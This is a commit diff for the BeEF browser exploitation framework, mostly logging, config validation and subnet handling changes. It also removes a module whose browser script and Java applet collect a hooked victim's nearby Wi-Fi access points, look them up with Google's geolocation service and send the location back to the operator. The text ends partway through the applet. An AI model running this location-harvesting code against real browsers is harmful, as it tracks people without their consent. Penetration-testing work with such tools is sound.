Bump version to 0.4.7.3-alpha

proxy:ignore case when ignoring headers

.github/ISSUE_TEMPLATE.md

@@ -3,7 +3,7 @@ Verify first that your issue/request has not been posted previously:
 * https://github.com/beefproject/beef/issues
 * https://github.com/beefproject/beef/wiki/FAQ
 
-Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.1).
+Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.2).
 
 
 #### Environment

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.7.1-alpha
+0.4.7.3-alpha

beef

@@ -7,7 +7,7 @@
 #
 
 #
-# @note stop deprecation warning from being displayed
+# @note stop Fixnum deprecation warning from being displayed
 #
 $VERBOSE = nil
 
@@ -26,7 +26,7 @@ end
 #
 if RUBY_PLATFORM.downcase.include?('mswin') || RUBY_PLATFORM.downcase.include?('mingw')
   puts
-  puts "Ruby platform #{RUBY_PLATFORM} is no longer supported."
+  puts "Ruby platform #{RUBY_PLATFORM} is not supported."
   puts
   exit 1
 end
@@ -39,20 +39,18 @@ $:.unshift($root_dir)
 $home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
 
 #
-# @note Require core loader's
+# @note Require core loader
 #
 require 'core/loader'
 
 #
-# @note Check the system language settings for UTF-8 compatibility
+# @note Create ~/.beef/
 #
-env_lang = ENV['LANG']
-if env_lang !~ /(utf8|utf-8)/i
-  print_warning "Warning: System language $LANG does not appear to be UTF-8 compatible."
-  if env_lang =~ /\A([a-z]+_[a-z]+)\./i
-    country = $1
-    print_more "Try: export LANG=#{country}.utf8"
-  end
+begin
+  FileUtils.mkdir_p($home_dir) unless File.directory?($home_dir)
+rescue => e
+  print_error "Could not create '#{$home_dir}': #{e.message}"
+  exit 1
 end
 
 #
@@ -65,20 +63,20 @@ else
 end
 
 #
-# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
+# @note set log level
 #
-require 'core/bootstrap'
+BeEF.logger.level = config.get('beef.debug') ? Logger::DEBUG : Logger::WARN
 
 #
-# @note Loads enabled extensions
+# @note Check the system language settings for UTF-8 compatibility
 #
-BeEF::Extensions.load
-
-#
-# @note Prints the BeEF ascii art if the -a flag was passed
-#
-if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
-  BeEF::Core::Console::Banners.print_ascii_art
+env_lang = ENV['LANG']
+if env_lang !~ /(utf8|utf-8)/i
+  print_warning "Warning: System language $LANG '#{env_lang}' does not appear to be UTF-8 compatible."
+  if env_lang =~ /\A([a-z]+_[a-z]+)\./i
+    country = $1
+    print_more "Try: export LANG=#{country}.utf8"
+  end
 end
 
 #
@@ -92,11 +90,65 @@ unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
   config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
 end
 
+#
+# @note Validate configuration file
+#
+unless BeEF::Core::Configuration.instance.validate
+  exit 1
+end
+
+#
+# @note Exit on default credentials
+#
+if config.get("beef.credentials.user").eql?('beef') && config.get("beef.credentials.passwd").eql?('beef')
+  print_error "ERROR: Default username and password in use!"
+  print_more "Change the beef.credentials.passwd in config.yaml"
+  exit 1
+end
+
+#
+# @note Validate beef.http.public and beef.http.public_port
+#
+unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
+  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
+  exit 1
+end
+
+unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
+  print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
+  exit 1
+end
+
+#
+# @note Validate database driver
+#
+unless ['sqlite', 'postgres', 'mysql'].include? config.get('beef.database.driver')
+  print_error 'No default database selected. Please add one in config.yaml'
+  exit 1
+end
+
+#
+# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
+#
+require 'core/bootstrap'
+
+#
+# @note Prints the BeEF ascii art if the -a flag was passed
+#
+if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
+  BeEF::Core::Console::Banners.print_ascii_art
+end
+
 #
 # @note Prints BeEF welcome message
 #
 BeEF::Core::Console::Banners.print_welcome_msg
 
+#
+# @note Loads enabled extensions
+#
+BeEF::Extensions.load
+
 #
 # @note Loads enabled modules
 #
@@ -142,7 +194,7 @@ begin
 rescue => e
   print_error "Could not connect to database: #{e.message}"
   if config.get("beef.database.driver") == 'sqlite'
-    print_more "Ensure the #{config.get("beef.database.db_file")} database file is writable"
+    print_error "Ensure the #{$root_dir}/#{config.get("beef.database.db_file")} database file is writable"
   end
   exit 1
 end
@@ -171,45 +223,6 @@ BeEF::Core::Console::Banners.print_loaded_modules
 BeEF::Core::Console::Banners.print_network_interfaces_count
 BeEF::Core::Console::Banners.print_network_interfaces_routes
 
-#
-# @note Create ~/.beef/
-#
-begin
-  FileUtils.mkdir_p($home_dir) unless File.directory?($home_dir)
-rescue => e
-  print_error "Could not create '#{$home_dir}': #{e.message}"
-end
-
-#
-# @note Check whether we load the Console Shell or not
-#
-if config.get("beef.extension.console.shell.enable") == true
-  print_error "The console extension is currently unsupported."
-  print_more "See issue #1090 - https://github.com/beefproject/beef/issues/1090"
-end
-
-#
-# @note Exit on default credentials
-#
-if config.get("beef.credentials.user").eql?('beef') && config.get("beef.credentials.passwd").eql?('beef')
-  print_error "ERROR: Default username and password in use!"
-  print_more "Change the beef.credentials.passwd in config.yaml"
-  exit 1
-end
-
-#
-# @note Validate beef.http.public and beef.http.public_port
-#
-unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
-  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
-  exit 1
-end
-                                                                                                                
-unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
-  print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
-  exit 1
-end
-
 #
 # @note Prints the API key needed to use the RESTful API
 #

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.7.1-alpha'
+    version: '0.4.7.3-alpha'
     # More verbose messages (server-side)
     debug: false
     # More verbose messages (client-side)
@@ -23,10 +23,10 @@ beef:
     # Interface / IP restrictions
     restrictions:
         # subnet of IP addresses that can hook to the framework
-        permitted_hooking_subnet: "0.0.0.0/0"
+        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
         # subnet of IP addresses that can connect to the admin UI
-        #permitted_ui_subnet: "127.0.0.1/32"
-        permitted_ui_subnet: "0.0.0.0/0"
+        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
+        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
         # slow API calls to 1 every  api_attempt_delay  seconds
         api_attempt_delay: "0.05"
 

core/loader.rb

@@ -32,6 +32,7 @@ require 'ansi'
 require 'term/ansicolor'
 require 'json'
 require 'data_objects'
+require 'dm-do-adapter'
 require 'parseconfig'
 require 'erubis'
 require 'mime/types'
@@ -39,6 +40,10 @@ require 'optparse'
 require 'resolv'
 require 'digest'
 require 'zip'
+require 'logger'
+
+# @note Logger
+require 'core/logger'
 
 # @note Include the filters
 require 'core/filters'

core/logger.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+#
+# @note log to file
+#
+module BeEF
+  class << self
+    attr_writer :logger
+
+    def logger
+        @logger ||= Logger.new("#{$home_dir}/beef.log").tap do |log|
+        log.progname = self.name
+        log.level = Logger::WARN
+      end
+    end
+  end
+end

core/main/configuration.rb

@@ -30,8 +30,8 @@ module BeEF
           @config.default = nil
           @@config = config
         rescue => e
-          print_error "Fatal Error: cannot load configuration file"
-          print_debug e
+          print_error "Fatal Error: cannot load configuration file '#{config}' : #{e.message}"
+          print_error e.backtrace
         end
 
         @@instance = self
@@ -45,8 +45,35 @@ module BeEF
         raw = File.read file
         YAML.safe_load raw
       rescue => e
-        print_debug "Unable to load '#{file}' #{e}"
-        nil
+        print_debug "Unable to load configuration file '#{file}' : #{e.message}"
+        print_error e.backtrace
+      end
+
+      #
+      # @note balidate the configuration file
+      #
+      def validate
+        if @config.empty?
+          print_error 'Configuration file is empty'
+          return
+	end
+
+        if @config['beef'].nil?
+          print_error "Configuration file is malformed: 'beef' is nil"
+          return
+        end
+
+        if @config['beef']['credentials'].nil?
+          print_error "Configuration file is malformed: 'beef.credentials' is nil"
+          return
+        end
+
+        if @config['beef']['http'].nil?
+          print_error "Configuration file is malformed: 'beef.http' is nil"
+          return
+        end
+
+        true
       end
 
       #

core/main/handlers/hookedbrowsers.rb

@@ -30,10 +30,19 @@ module Handlers
       
       # @note check source ip address of browser
       permitted_hooking_subnet = config.get('beef.restrictions.permitted_hooking_subnet')
-      target_network = IPAddr.new(permitted_hooking_subnet)
-      if not target_network.include?(request.ip)
-        BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{request.ip}) rejected.")
-        error 500
+      if permitted_hooking_subnet.nil? || permitted_hooking_subnet.empty?
+        BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from outside of permitted hooking subnet (#{request.ip}) rejected.")
+	error 404
+      end
+
+      found = false
+      permitted_hooking_subnet.each do |subnet|
+        found = true if IPAddr.new(subnet).include?(request.ip)
+      end
+
+      unless found
+        BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from outside of permitted hooking subnet (#{request.ip}) rejected.")
+        error 404
       end
 
       # @note get zombie if already hooked the framework

core/main/network_stack/websocket/websocket.rb

@@ -96,7 +96,7 @@ module BeEF
                       print_debug "[WebSocket] New message: #{msg_hash}" if @@debug
                     rescue => e
                       print_error "[WebSocket] Failed parsing WebSocket message: #{e.message}"
-                      puts e.backtrace
+                      print_error e.backtrace
                       next
                     end
 

core/main/rest/api.rb

@@ -70,15 +70,20 @@ module BeEF
       # This is from extensions/admin_ui/controllers/authentication/authentication.rb
       #
       def self.permitted_source?(ip)
-        # get permitted subnet
+        # test if supplied IP address is valid
+        return false unless BeEF::Filters::is_valid_ip?(ip)
+
+        # get permitted subnets
         permitted_ui_subnet = BeEF::Core::Configuration.instance.get("beef.restrictions.permitted_ui_subnet")
-        target_network = IPAddr.new(permitted_ui_subnet)
+	return false if permitted_ui_subnet.nil?
+	return false if permitted_ui_subnet.empty?
 
-        # test if supplied IP address is valid dot-decimal format
-        return false unless ip =~ /\A[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\z/
+        # test if ip within subnets
+	permitted_ui_subnet.each do |subnet|
+          return true if IPAddr.new(subnet).include?(ip)
+	end
 
-        # test if ip within subnet
-        return target_network.include?(ip)
+        false
       end
 
       #

core/main/server.rb

@@ -154,7 +154,7 @@ module BeEF
         end
       rescue => e
         print_error "Failed to prepare HTTP server: #{e.message}"
-	puts e.backtrace
+	print_error e.backtrace
 	exit 1
       end
 

core/ruby.rb

@@ -14,6 +14,3 @@ require 'core/ruby/string'
 require 'core/ruby/print'
 require 'core/ruby/hash'
 
-# @note Patching DataMapper Data Objects Adapter (dm-do-adapter)
-require 'core/ruby/patches/dm-do-adapter/adapter.rb'
-

core/ruby/patches/dm-do-adapter/adapter.rb

@@ -1,74 +0,0 @@
-#
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-
-
-# @note The following file contains patches for DataMapper Data Objects Adapter (dm-do-adapter)
-#   This patch fixes the following error:
-#   DataObjects::URI.new with arguments is deprecated, use a Hash of URI components (/home/username/.rvm/gems/ruby-1.9.2-p290/gems/dm-do-adapter-1.1.0/lib/dm-do-adapter/adapter.rb:231:in `new')
-#   The error is patched in dm-do-adapter 1.1.1 however it has yet to be released.
-#   Patch: https://github.com/datamapper/dm-do-adapter/commit/7f0b53d1ada8735910e04ff37d60c6ff037ce288
-
-=begin
-Deleted:
-<             DataObjects::URI.new(
-<               @options[:adapter],
-<               @options[:user] || @options[:username],
-<               @options[:password],
-<               @options[:host],
-<               port,
-<               @options[:path] || @options[:database],
-<               query,
-<               @options[:fragment]
-<             ).freeze
-
-Added:
->             DataObjects::URI.new({
->               :scheme     => @options[:adapter],
->               :user       => @options[:user] || @options[:username],
->               :password   => @options[:password],
->               :host       => @options[:host],
->               :port       => port,
->               :path       => @options[:path] || @options[:database],
->               :query      => query,
->               :fragment   => @options[:fragment]
->             }).freeze
-=end
-
-require 'dm-do-adapter'
-
-module DataMapper
-  module Adapters
-    class DataObjectsAdapter < AbstractAdapter
-
-      def normalized_uri
-        @normalized_uri ||=
-            begin
-              keys = [
-                  :adapter, :user, :password, :host, :port, :path, :fragment,
-                  :scheme, :query, :username, :database ]
-              query = DataMapper::Ext::Hash.except(@options, keys)
-              query = nil if query.empty?
-
-              # Better error message in case port is no Numeric value
-              port = @options[:port].nil? ? nil : @options[:port].to_int
-
-              DataObjects::URI.new({
-                                       :scheme     => @options[:adapter],
-                                       :user       => @options[:user] || @options[:username],
-                                       :password   => @options[:password],
-                                       :host       => @options[:host],
-                                       :port       => port,
-                                       :path       => @options[:path] || @options[:database],
-                                       :query      => query,
-                                       :fragment   => @options[:fragment]
-                                   }).freeze
-            end
-      end
-
-    end
-  end
-end
-

core/ruby/print.rb

@@ -8,12 +8,14 @@
 # @param [String] s String to be printed
 def print_error(s)
   puts Time.now.localtime.strftime("[%k:%M:%S]")+'[!]'.red+' '+s
+  BeEF.logger.error s.to_s
 end
 
 # Function used to print information to the console
 # @param [String] s String to be printed
 def print_info(s)
   puts Time.now.localtime.strftime("[%k:%M:%S]")+'[*]'.blue+' '+s
+  BeEF.logger.info s.to_s
 end
 
 # Function used to print information to the console (wraps print_info)
@@ -26,6 +28,7 @@ end
 # @param [String] s String to be printed
 def print_warning(s)
   puts Time.now.localtime.strftime("[%k:%M:%S]")+'[!]'.yellow+' '+s.to_s
+  BeEF.logger.warn s.to_s
 end
 
 # Function used to print debug information
@@ -35,6 +38,7 @@ def print_debug(s)
   config = BeEF::Core::Configuration.instance
   if config.get('beef.debug') || BeEF::Core::Console::CommandLine.parse[:verbose]
     puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
+    BeEF.logger.debug s.to_s
   end
 end
 
@@ -42,6 +46,7 @@ end
 # @param [String] s String to be printed
 def print_success(s)
   puts Time.now.localtime.strftime("[%k:%M:%S]")+'[+]'.green+' '+s
+  BeEF.logger.info s.to_s
 end
 
 # Function used to print successes to the console (wraps print_success)
@@ -65,8 +70,10 @@ def print_more(s)
   lines.each_with_index do |line, index|
     if ((index+1) == lines.size)
       puts "#{time}    |_  #{line}"
+      BeEF.logger.info "#{time}    |_  #{line}"
     else
       puts "#{time}    |   #{line}"
+      BeEF.logger.info "#{time}    |   #{line}"
     end
   end
 end
@@ -77,4 +84,5 @@ end
 def print_over(s)
   time = Time.now.localtime.strftime("[%k:%M:%S]")
   print "\r#{time}"+"[*]".blue+" #{s}"
+  BeEF.logger.info s.to_s
 end

extensions/admin_ui/api/handler.rb

@@ -43,7 +43,7 @@ module API
       File.path write_to
     rescue => e
       print_error "[AdminUI] Error: #{e.message}"
-      puts e.backtrace
+      print_error e.backtrace
     end
 
     def self.build_javascript_ui(beef_server)

extensions/admin_ui/classes/httpcontroller.rb

@@ -81,7 +81,7 @@ module AdminUI
       end
     rescue => e
       print_error "Error handling HTTP request: #{e.message}"
-      puts e.backtrace
+      print_error e.backtrace
     end
 
     # Constructs a html script tag (from media/javascript directory)

extensions/admin_ui/controllers/authentication/authentication.rb

@@ -47,8 +47,8 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
     ua_ip = @request.ip # get client ip address
     @body = '{ success : false }' # attempt to fail closed
 
-    # check if source IP address is permited to authenticate
-    if not permited_source?(ua_ip)
+    # check if source IP address is permitted to authenticate
+    if not permitted_source?(ua_ip)
       BeEF::Core::Logger.instance.register('Authentication', "IP source address (#{@request.ip}) attempted to authenticate but is not within permitted subnet.")
       return
     end
@@ -105,19 +105,22 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
   #
   # Check the UI browser source IP is within the permitted subnet
   #
-  def permited_source?(ip)
-    # get permitted subnet
-    config = BeEF::Core::Configuration.instance
-    permitted_ui_subnet = config.get('beef.restrictions.permitted_ui_subnet')
-    target_network = IPAddr.new(permitted_ui_subnet)
-    # test if supplied IP address is valid dot-decimal format
-    return false unless ip =~ /\A[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\z/
-    # test if ip within subnet
-    return target_network.include?(ip)
+  def permitted_source?(ip)
+    # test if supplied IP address is valid
+    return false unless BeEF::Filters::is_valid_ip?(ip)
+
+    # get permitted subnets
+    permitted_ui_subnet = BeEF::Core::Configuration.instance.get("beef.restrictions.permitted_ui_subnet")
+    return false if permitted_ui_subnet.nil?
+    return false if permitted_ui_subnet.empty?
+
+    # test if ip within subnets
+    permitted_ui_subnet.each do |subnet|
+      return true if IPAddr.new(subnet).include?(ip)
+    end
+
+    false
   end
-
-
-
 end
 
 end

extensions/console/extension.rb

@@ -15,6 +15,18 @@ module Console
   @short_name = @full_name = 'console'
   @description = 'console environment to manage beef'
 
+  module PostLoad
+    BeEF::API::Registrar.instance.register(BeEF::Extension::Console::PostLoad, BeEF::API::Extensions, 'post_load')
+
+    def self.post_load
+      if BeEF::Core::Configuration.instance.get("beef.extension.console.enable")
+        print_error "The console extension is currently unsupported."
+        print_more "See issue #1090 - https://github.com/beefproject/beef/issues/1090"
+        BeEF::Core::Configuration.instance.set('beef.extension.console.enable', false)
+        BeEF::Core::Configuration.instance.set('beef.extension.console.loaded', false)
+      end
+    end
+  end
 end
 end
 end

extensions/evasion/evasion.rb

@@ -66,7 +66,7 @@ module BeEF
           bootstrap
         rescue => e
           print_error "[Evasion] Failed to bootstrap obfuscation technique: #{e.message}"
-          puts e.backtrace
+          print_error e.backtrace
         end
 
         def apply_chain(input)
@@ -83,7 +83,7 @@ module BeEF
           output
         rescue => e
           print_error "[Evasion] Failed to apply obfuscation technique: #{e.message}"
-          puts e.backtrace
+          print_error e.backtrace
         end
       end
     end

extensions/metasploit/api.rb

@@ -30,14 +30,15 @@ module BeEF
 
             if connected
               msf_module_config = {}
-              path = "#{$root_dir}/#{BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')}"
-              if !BeEF::Core::Console::CommandLine.parse[:resetdb] && File.exists?("#{path}msf-exploits.cache")
-                print_debug "Attempting to use Metasploit exploits cache file"
-                raw = File.read("#{path}msf-exploits.cache")
+              path = "#{$root_dir}/#{BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')}/msf-exploits.cache"
+              if !BeEF::Core::Console::CommandLine.parse[:resetdb] && File.exist?(path)
+                print_debug 'Attempting to use Metasploit exploits cache file'
+                raw = File.read(path)
                 begin
                   msf_module_config = YAML.load(raw)
                 rescue => e
-                  puts e
+                  print_error "[Metasploit] #{e.message}"
+                  print_error e.backtrace
                 end
                 count = 1
                 msf_module_config.each { |k, v|
@@ -102,9 +103,9 @@ module BeEF
                   end
                 }
                 print "\r\n"
-                File.open("#{path}msf-exploits.cache", "w") do |f|
+                File.open(path, "w") do |f|
                   f.write(msf_module_config.to_yaml)
-                  print_debug "Wrote Metasploit exploits to cache file"
+                  print_debug "Wrote Metasploit exploits to cache file: #{path}"
                 end
               end
               BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)

extensions/metasploit/rpcclient.rb

@@ -128,7 +128,7 @@ module Metasploit
       super(meth, *args)
     rescue => e
       print_error "[Metasploit] RPC call to '#{meth}' failed: #{e}"
-      puts e.backtrace
+      print_error e.backtrace
       return
     end
     

extensions/proxy/proxy.rb

@@ -171,7 +171,7 @@ module BeEF
               header_key = line.split(': ')[0]
               header_value = line.split(': ')[1]
               next if header_key.nil?
-              next if ignore_headers.include?(header_key)
+              next if ignore_headers.any?{ |h| h.casecmp(header_key) == 0 }
               if header_value.nil?
                 #headers_hash[header_key] = ""
               else

install

@@ -86,7 +86,7 @@ install_linux () {
     Distro='Alpine'
   elif [ -f /etc/os-release ] ; then
     #DISTRO_ID=$(grep ^ID= /etc/os-release | cut -d= -f2-)
-    DISTRO_ID=$(cat /etc/os-release | grep  ID= | cut -d= -f2-)
+    DISTRO_ID=$(cat /etc/os-release | grep  ID= | grep -v "BUILD" | cut -d= -f2-)
     if [ "${DISTRO_ID}" = 'kali' ] ; then
       Distro='Kali'
     elif [ "${DISTRO_ID}" = 'arch' ] || [ "${DISTRO_ID}" = 'manjaro' ] ; then
@@ -207,14 +207,23 @@ install_beef () {
   else
     bundle install --without test development
   fi
+}
 
+finish () {
   echo
-  echo "=========================================="
+  echo "#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#"
   echo
   info "Install completed successfully!"
   info "Run './beef' to launch BeEF"
   echo
-  echo "=========================================="
+  echo "Next steps:"
+  echo
+  echo "* Change the default password in config.yaml"
+  echo "* Run ./update-geoipdb to install the Maxmind GeoIP database"
+  echo "* Review the wiki for important configuration information:"
+  echo "  https://github.com/beefproject/beef/wiki/Configuration"
+  echo
+  echo "#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#"
   echo
 }
 
@@ -239,6 +248,7 @@ main () {
   check_rubygems
   check_bundler
   install_beef
+  finish
 }
 
 main "$@"

modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x64.rb

@@ -9,7 +9,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module MetasploitModule
 
 	include Msf::Payload::Linux
 	include Msf::Sessions::CommandShellOptions

modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x86.rb

@@ -9,7 +9,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module MetasploitModule
 
 	include Msf::Payload::Linux
 	include Msf::Sessions::CommandShellOptions

modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-windows-x86.rb

@@ -14,7 +14,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module MetasploitModule
 
 	include Msf::Payload::Windows
 	include Msf::Sessions::CommandShellOptions

modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x64.rb

@@ -10,7 +10,7 @@ require 'msf/core'
 require 'msf/core/handler/beef_bind'
 
 
-module Metasploit3
+module MetasploitModule
 
 	include Msf::Payload::Stager
 	include Msf::Payload::Linux

modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x86.rb

@@ -10,7 +10,7 @@ require 'msf/core'
 require 'msf/core/handler/beef_bind'
 
 
-module Metasploit3
+module MetasploitModule
 
 	include Msf::Payload::Stager
 	include Msf::Payload::Linux

modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-windows-x86.rb

@@ -14,7 +14,7 @@ require 'msf/core'
 require 'msf/core/handler/beef_bind'
 
 
-module Metasploit3
+module MetasploitModule
 
 	include Msf::Payload::Stager
 	include Msf::Payload::Windows

modules/host/get_internal_ip/config.yaml

@@ -1,15 +0,0 @@
-#
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
-    module:
-        get_internal_ip:
-            enable: true
-            category: "Host"
-            name: "Get Internal IP (Java)"
-            description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet.<br/><br/>The browser must have Java enabled and configured to allow execution of unsigned Java applets."
-            authors: ["antisnatchor"]
-            target:
-                 user_notify: ["ALL"]

modules/host/get_internal_ip_java/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        get_internal_ip_java:
+            enable: true
+            category: "Host"
+            name: "Get Internal IP (Java)"
+            description: "Retrieve the local network interface IP address of the victim machine using an unsigned Java applet.<br/><br/>The browser must have Java enabled and configured to allow execution of unsigned Java applets.<br/><br/>Note that modern Java (as of Java 7u51) will outright refuse to execute unsigned Java applets, and will also reject self-signed Java applets unless they're added to the exception list."
+            authors: ["antisnatchor"]
+            target:
+                 user_notify: ["ALL"]

modules/host/get_internal_ip_java/module.rb

@@ -3,10 +3,10 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-class Get_internal_ip < BeEF::Core::Command
+class Get_internal_ip_java < BeEF::Core::Command
 
   def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_internal_ip/get_internal_ip.class', '/get_internal_ip', 'class')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_internal_ip_java/get_internal_ip.class', '/get_internal_ip', 'class')
   end
 
   #def self.options

modules/host/get_physical_location/command.js

@@ -1,21 +0,0 @@
-/*
- * Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
- * Browser Exploitation Framework (BeEF) - http://beefproject.com
- * See the file 'doc/COPYING' for copying permission
- */
-
-beef.execute(function() {
-    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
-    var applet_id = '<%= @applet_id %>';
-    var applet_name = '<%= @applet_name %>';
-    var output;
-    beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'getGPSLocation' ,
-       	null, applet_archive, null);
-    output = document.Microsoft_Corporation.getInfo();
-    if (output) {
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output);
-    }
-    beef.dom.detachApplet('getGPSLocation');
-});
-
-

modules/host/get_physical_location/config.yaml

@@ -1,17 +0,0 @@
-#
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-
-beef:
-    module:
-        get_physical_location:
-            enable: true
-            category: "Host"
-            name: "Get Physical Location"
-            description: "This module will retrieve geolocation information based on the neighboring wireless access points using commands encapsulated within a signed Java Applet. <br/><br/>The details will include:<br/> <ul><li> - GPS Coordinates details</li><li> - Street Address details</li></ul><br/><br/> If the victim machine has a firewall that monitors outgoing connections (Zonealaram, LittleSnitch, ..), calls to Google maps will be alerted."
-            authors: ["keith_lee @keith55 http://milo2012.wordpress.com", "antisnatchor"]
-            target:
-                working: ["IE"]
-                user_notify: ["C", "S", "O", "FF"]

modules/host/get_physical_location/getGPSLocation.java

@@ -1,184 +0,0 @@
-/*
- * Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
- * Browser Exploitation Framework (BeEF) - http://beefproject.com
- * See the file 'doc/COPYING' for copying permission
- */
-
-import java.io.*;  
-import java.util.*;
-import java.net.*;
-import java.applet.*;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
-
-// Keith Lee
-// Twitter: @keith55
-// http://milo2012.wordpress.com
-// keith.lee2012[at]gmail.com
-
-public class getGPSLocation extends Applet{  
-	public static String result = "";
-	
-	public getGPSLocation(){
-		super();
-		return;
-	}
-	public static String getInfo() {
-		return result;
-	}
-
-	public void init() {
-		if (isWindows()) {
-			result=getWindows();
-		} else if (isMac()) {
-			result=getMac();
-		} else {
-			//System.out.println("Your OS is not support!!");
-		}
-	}
-	
-	public static String getWindows(){
-            try {  
-			
-		ArrayList ssidList = new ArrayList();
-		ArrayList bssidList = new ArrayList();
-		ArrayList rssiList = new ArrayList();
-			
-		Process p = Runtime.getRuntime().exec("netsh wlan show networks mode=bssid");  
-                
-		BufferedReader in = new BufferedReader(  
-                                    new InputStreamReader(p.getInputStream()));  
-                String line = null;  
-		String signal = null;
-		String ssidStr = null;
-		
-		while ((line = in.readLine()) != null) {  
-			
-			Pattern p1 = Pattern.compile("(SSID\\s\\d+\\s:)\\s([\\w\\s]*)");
-			Matcher m1 = p1.matcher(line);
-			if(m1.find()){
-				ssidStr = m1.group(2);
-				ssidStr = ssidStr.replaceAll(" ","%20");
-				ssidList.add(ssidStr);
-			}	
-			Pattern p2 = Pattern.compile("(BSSID\\s1\\s*:)\\s((.?)*)");
-			Matcher m2 = p2.matcher(line);
-			if(m2.find()){
-				bssidList.add(m2.group(2));
-			}	
-			Pattern p3 = Pattern.compile("(Signal\\s*):\\s((.?)*)");
-			Matcher m3 = p3.matcher(line);
-			if(m3.find()){
-				signal = m3.group(2);
-				signal = signal.replaceAll("%","");
-				signal = signal.replaceAll(" ","");
-				signal = "-"+signal;
-				rssiList.add(signal);
-			}											
-		}
-
-		int arraySize=ssidList.size();
-		if(arraySize==0){
-			result="\nI don't know where the target is";
-		}
-		else{
-			result=googleLookup(bssidList,ssidList,rssiList);
-		}
-	         } catch (Exception e) {  
-	        	System.out.println(e.getMessage());
-            }
-			return result;          
-	}
-	
-	public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
-	    String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
-	    try {  
-			int j=0;
-			while(j<ssidList.size()){
-				queryString+="&wifi=mac:";
-				queryString+=bssidList.get(j);
-				queryString+="%7C";
-				
-				queryString+="ssid:";
